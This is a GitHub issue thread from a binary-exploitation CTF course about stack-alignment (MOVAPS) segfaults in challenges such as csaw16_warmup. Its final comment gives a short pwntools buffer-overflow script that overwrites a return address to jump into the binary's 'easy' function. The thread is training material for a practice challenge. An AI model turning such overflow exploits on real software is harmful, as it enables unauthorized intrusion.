### ISSUE TITLE
Unaddressed stack alignment issues

### ISSUE THREAD

**Issue by 6d8** [guyinatuxedo/nightmare#63]
I figured this would be the best place to put this note, please let me know if I should remove it and place it elsewhere. 

Several of the challenges, for example 'csaw16_warmup' and 'csaw18_getit' have, in certain systems (in my case Ubuntu), stack alignment issues which leads to a segfault when 'movaps' is called inside 'do_sysytem'. ROPemporium.com refers to this as the 'MOVAPS issue' and suggests using a dummy 'ret' in ROP cases. In non ROP cases I've found incrementing the target functions address by one, thereby skipping the first instruction, works a charm.

This stumped me for some time, and I'm hoping either the challenge will be updated to acknowledge the issue, or this comment will at least make someone's life a little easier.

**Comment by sasaga** [comment]
I faced the same problem, I can't find a logical explanation, could you understand why it was happening?

It seems that the battery is misaligned.

**Comment by nullchilly** [comment]
For future visitors, in `csaw16_warmup` it should be:

```py
from pwn import *

target = process('./warmup')
#gdb.attach(target, gdbscript = 'b *0x4006a3')

# Make the payload
payload = ""
payload += "0"*0x48 # Overflow the buffer up to the return address
payload += p64(0x40060d + 1) # Overwrite the return address with the address of the `easy` function

# Send the payload
target.sendline(payload)

target.interactive()
```
